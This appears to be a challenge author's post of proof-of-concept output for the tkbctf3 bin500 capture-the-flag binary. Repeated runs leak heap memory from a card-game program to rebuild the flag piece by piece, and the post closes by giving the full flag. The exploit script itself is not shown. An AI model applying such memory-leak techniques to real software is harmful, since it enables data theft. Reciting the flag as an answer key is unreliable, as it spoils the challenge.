PoC for tkbctf3 bin500

I'm the author of tkbctf3 bin500. Here is a PoC and files :)

archive/tkbctf3/bin500_game

output:

% ../poc.py 0
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000428
[*] cards:              [b'C7', b'C7', b'CX', b'CX', b'CX', b'CX']
[*] decoded flag:       bytearray(b'  ####')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000478
[*] cards:              []
[*] decoded flag:       bytearray(b'')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000430
[*] cards:              [b'C7', b'C7', b'CX', b'CX', b'CX', b'CX']
[*] decoded flag:       bytearray(b'  ####')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000458
[*] cards:              [b'he 1st card to open\r\n', b'rdinate of the 1st card to open\r\n', b'**', b'the coordinate of the 2nd card to open\r\n', b'HJ', b'e of the 1st card to open\r\n']
[*] decoded flag:       bytearray(b'PL4Y1N')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000490
[*] cards:              []
[*] decoded flag:       bytearray(b'')

% ../poc.py 6
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000498
[*] cards:              []
[*] decoded flag:       bytearray(b'')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000458
[*] cards:              [b'CX', b'CX', b'C7', b'C7', b'CX', b'CX']
[*] decoded flag:       bytearray(b'##  ##')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000488
[*] cards:              []
[*] decoded flag:       bytearray(b'')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000488
[*] cards:              [b'CX', b'CX', b'C7', b'C7', b'CX', b'CX']
[*] decoded flag:       bytearray(b'##  ##')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000480
[*] cards:              [b'\r\n', b'the 2nd card to open\r\n', b'Input the coordinate of the 2nd card to open\r\n', b'HJ', b' like concentration game?\r\n', b'nput the coordinate of the 1st card to open\r\n']
[*] decoded flag:       bytearray(b'G_W17H')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000410
[*] cards:              []
[*] decoded flag:       bytearray(b'')

% ../poc.py 12
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000478
[*] cards:              [b'the 2nd card to open\r\n', b'nput the coordinate of the 1st card to open\r\n', b'HK', b'HK', b'HK', b'HK']
[*] decoded flag:       bytearray(b'_H3333')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   000003e8
[*] cards:              []
[*] decoded flag:       bytearray(b'')

% ../poc.py 18
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000468
[*] cards:              [b'HK', b'**', b'he 1st card to open\r\n', b'SJ', b'S1', b'S1']
[*] decoded flag:       bytearray(b'34P\n\x00\x00')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   000003d8
[*] cards:              []
[*] decoded flag:       bytearray(b'')

flag:

What is the flag?
PL4Y1NG_W17H_H333334P